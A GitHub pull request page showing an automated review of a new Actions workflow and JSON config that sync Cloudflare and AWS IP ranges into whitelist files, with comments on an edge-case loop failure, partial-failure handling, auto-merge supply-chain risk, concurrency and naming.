Conversation
There was a problem hiding this comment.
Pull request overview
Adds a scheduled GitHub Actions workflow to periodically download CDN/provider IP ranges from external sources, write them into repo-managed whitelist files, and open a PR with the updates.
Changes:
- Introduces a new scheduled/dispatchable workflow to fetch, transform (optional
jq), and write external source outputs. - Adds a JSON configuration file describing each external source (URL, output path, optional
jq_filter/header). - Automates PR creation (and auto-merge) when outputs change.
Reviewed changes
Copilot reviewed 2 out of 2 changed files in this pull request and generated 6 comments.
| File | Description |
|---|---|
| .github/workflows/sync-external-sources.yml | New workflow to download/process sources, commit updates, open PR, and auto-merge. |
| .github/sync-sources.json | Defines the external sources and output file locations (including AWS ip-ranges jq filters). |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| for i in $(seq 0 $(( COUNT - 1 ))); do | ||
| NAME=$(jq -r ".[$i].name" "$CONFIG_FILE") | ||
| URL=$(jq -r ".[$i].url" "$CONFIG_FILE") | ||
| OUTPUT=$(jq -r ".[$i].output" "$CONFIG_FILE") | ||
| JQ_FILTER=$(jq -r ".[$i].jq_filter // empty" "$CONFIG_FILE") | ||
| HEADER=$(jq -r ".[$i].header // empty" "$CONFIG_FILE") | ||
|
|
||
| echo "--- Processing: $NAME ---" | ||
| echo " URL: $URL" | ||
| echo " Output: $OUTPUT" | ||
|
|
||
| TMPFILE=$(mktemp) | ||
| if ! curl -fsSL "$URL" -o "$TMPFILE"; then | ||
| echo "::warning::Failed to download $NAME from $URL" | ||
| ERRORS="$ERRORS $NAME" | ||
| rm -f "$TMPFILE" | ||
| continue | ||
| fi | ||
|
|
||
| OUTFILE=$(mktemp) | ||
|
|
||
| if [ -n "$HEADER" ]; then | ||
| echo "$HEADER" > "$OUTFILE" | ||
| else | ||
| : > "$OUTFILE" | ||
| fi | ||
|
|
||
| if [ -n "$JQ_FILTER" ]; then | ||
| if ! jq -r "$JQ_FILTER" "$TMPFILE" >> "$OUTFILE"; then | ||
| echo "::warning::jq filter failed for $NAME" | ||
| ERRORS="$ERRORS $NAME" | ||
| rm -f "$TMPFILE" "$OUTFILE" | ||
| continue | ||
| fi | ||
| else | ||
| cat "$TMPFILE" >> "$OUTFILE" | ||
| fi | ||
|
|
||
| rm -f "$TMPFILE" | ||
|
|
||
| mkdir -p "$(dirname "$OUTPUT")" | ||
|
|
||
| if [ -f "$OUTPUT" ] && cmp -s "$OUTFILE" "$OUTPUT"; then | ||
| echo " No changes for $NAME" | ||
| rm -f "$OUTFILE" | ||
| else | ||
| mv "$OUTFILE" "$OUTPUT" | ||
| echo " Updated: $OUTPUT" | ||
| CHANGED_FILES="$CHANGED_FILES $OUTPUT" | ||
| CHANGED_NAMES="$CHANGED_NAMES $NAME" | ||
| fi | ||
| done |
There was a problem hiding this comment.
If .github/sync-sources.json is an empty array, seq 0 $((COUNT - 1)) becomes seq 0 -1 and the step will fail under set -e. Consider guarding for COUNT == 0 (skip loop) or iterating via jq -c '.[]' instead of index arithmetic.
| for i in $(seq 0 $(( COUNT - 1 ))); do | |
| NAME=$(jq -r ".[$i].name" "$CONFIG_FILE") | |
| URL=$(jq -r ".[$i].url" "$CONFIG_FILE") | |
| OUTPUT=$(jq -r ".[$i].output" "$CONFIG_FILE") | |
| JQ_FILTER=$(jq -r ".[$i].jq_filter // empty" "$CONFIG_FILE") | |
| HEADER=$(jq -r ".[$i].header // empty" "$CONFIG_FILE") | |
| echo "--- Processing: $NAME ---" | |
| echo " URL: $URL" | |
| echo " Output: $OUTPUT" | |
| TMPFILE=$(mktemp) | |
| if ! curl -fsSL "$URL" -o "$TMPFILE"; then | |
| echo "::warning::Failed to download $NAME from $URL" | |
| ERRORS="$ERRORS $NAME" | |
| rm -f "$TMPFILE" | |
| continue | |
| fi | |
| OUTFILE=$(mktemp) | |
| if [ -n "$HEADER" ]; then | |
| echo "$HEADER" > "$OUTFILE" | |
| else | |
| : > "$OUTFILE" | |
| fi | |
| if [ -n "$JQ_FILTER" ]; then | |
| if ! jq -r "$JQ_FILTER" "$TMPFILE" >> "$OUTFILE"; then | |
| echo "::warning::jq filter failed for $NAME" | |
| ERRORS="$ERRORS $NAME" | |
| rm -f "$TMPFILE" "$OUTFILE" | |
| continue | |
| fi | |
| else | |
| cat "$TMPFILE" >> "$OUTFILE" | |
| fi | |
| rm -f "$TMPFILE" | |
| mkdir -p "$(dirname "$OUTPUT")" | |
| if [ -f "$OUTPUT" ] && cmp -s "$OUTFILE" "$OUTPUT"; then | |
| echo " No changes for $NAME" | |
| rm -f "$OUTFILE" | |
| else | |
| mv "$OUTFILE" "$OUTPUT" | |
| echo " Updated: $OUTPUT" | |
| CHANGED_FILES="$CHANGED_FILES $OUTPUT" | |
| CHANGED_NAMES="$CHANGED_NAMES $NAME" | |
| fi | |
| done | |
| if [ "$COUNT" -eq 0 ]; then | |
| echo "No sources configured in $CONFIG_FILE; nothing to do." | |
| else | |
| for i in $(seq 0 $(( COUNT - 1 ))); do | |
| NAME=$(jq -r ".[$i].name" "$CONFIG_FILE") | |
| URL=$(jq -r ".[$i].url" "$CONFIG_FILE") | |
| OUTPUT=$(jq -r ".[$i].output" "$CONFIG_FILE") | |
| JQ_FILTER=$(jq -r ".[$i].jq_filter // empty" "$CONFIG_FILE") | |
| HEADER=$(jq -r ".[$i].header // empty" "$CONFIG_FILE") | |
| echo "--- Processing: $NAME ---" | |
| echo " URL: $URL" | |
| echo " Output: $OUTPUT" | |
| TMPFILE=$(mktemp) | |
| if ! curl -fsSL "$URL" -o "$TMPFILE"; then | |
| echo "::warning::Failed to download $NAME from $URL" | |
| ERRORS="$ERRORS $NAME" | |
| rm -f "$TMPFILE" | |
| continue | |
| fi | |
| OUTFILE=$(mktemp) | |
| if [ -n "$HEADER" ]; then | |
| echo "$HEADER" > "$OUTFILE" | |
| else | |
| : > "$OUTFILE" | |
| fi | |
| if [ -n "$JQ_FILTER" ]; then | |
| if ! jq -r "$JQ_FILTER" "$TMPFILE" >> "$OUTFILE"; then | |
| echo "::warning::jq filter failed for $NAME" | |
| ERRORS="$ERRORS $NAME" | |
| rm -f "$TMPFILE" "$OUTFILE" | |
| continue | |
| fi | |
| else | |
| cat "$TMPFILE" >> "$OUTFILE" | |
| fi | |
| rm -f "$TMPFILE" | |
| mkdir -p "$(dirname "$OUTPUT")" | |
| if [ -f "$OUTPUT" ] && cmp -s "$OUTFILE" "$OUTPUT"; then | |
| echo " No changes for $NAME" | |
| rm -f "$OUTFILE" | |
| else | |
| mv "$OUTFILE" "$OUTPUT" | |
| echo " Updated: $OUTPUT" | |
| CHANGED_FILES="$CHANGED_FILES $OUTPUT" | |
| CHANGED_NAMES="$CHANGED_NAMES $NAME" | |
| fi | |
| done | |
| fi |
| fi | ||
|
|
||
| - name: Create PR with changes | ||
| if: env.NEEDS_UPDATE == 'true' |
There was a problem hiding this comment.
The workflow records download/jq failures in ERRORS but still proceeds to open and auto-merge a PR if any other source changed. This can merge partial/incomplete updates. Consider failing the job when ERRORS is non-empty, or at least skipping PR creation/merge when any source failed.
| fi | |
| - name: Create PR with changes | |
| if: env.NEEDS_UPDATE == 'true' | |
| echo "HAS_ERRORS=true" >> "$GITHUB_ENV" | |
| fi | |
| - name: Create PR with changes | |
| if: env.NEEDS_UPDATE == 'true' && env.HAS_ERRORS != 'true' |
|
|
||
| gh pr merge --auto --merge "$PR_URL" |
There was a problem hiding this comment.
Auto-merging content pulled directly from third-party URLs (gh pr merge --auto --merge) creates a supply-chain risk (a compromised upstream could push arbitrary changes into this repo). Consider removing auto-merge, requiring review, and/or validating that the generated files only contain expected IP/CIDR lines before creating/merging the PR.
| gh pr merge --auto --merge "$PR_URL" |
| name: Sync External Sources | ||
|
|
||
| on: | ||
| schedule: | ||
| - cron: "0 0 * * *" # every day at midnight UTC | ||
| workflow_dispatch: {} | ||
|
|
There was a problem hiding this comment.
There’s no concurrency configured, so a manual dispatch overlapping with the scheduled run (or a slow run overlapping the next schedule) can create multiple branches/PRs and potential merge conflicts. Consider adding a workflow-level concurrency group (e.g., based on workflow name) with cancel-in-progress: true.
| { | ||
| "name": "cloudflare-ipv6", | ||
| "url": "https://www.cloudflare.com/ips-v6", | ||
| "output": "whitelists/cdn_providers/cloudflare_ip6s.txt" |
There was a problem hiding this comment.
cloudflare_ip6s.txt is a slightly ambiguous filename ("ip6s" isn’t a common abbreviation elsewhere in this repo). Consider renaming to something clearer/consistent like cloudflare_ipv6.txt/cloudflare_ipv6s.txt to make it easier to discover and avoid accidental typos in downstream consumers.
| "output": "whitelists/cdn_providers/cloudflare_ip6s.txt" | |
| "output": "whitelists/cdn_providers/cloudflare_ipv6s.txt" |
| mv "$OUTFILE" "$OUTPUT" | ||
| echo " Updated: $OUTPUT" | ||
| CHANGED_FILES="$CHANGED_FILES $OUTPUT" | ||
| CHANGED_NAMES="$CHANGED_NAMES $NAME" | ||
| fi |
There was a problem hiding this comment.
CHANGED_FILES/CHANGED_NAMES are built by prefixing each append with a space, which leaves a leading space in the final values (affecting PR title/body formatting) and relies on word-splitting later. Consider using a newline-delimited list or a bash array and joining when needed.
No description provided.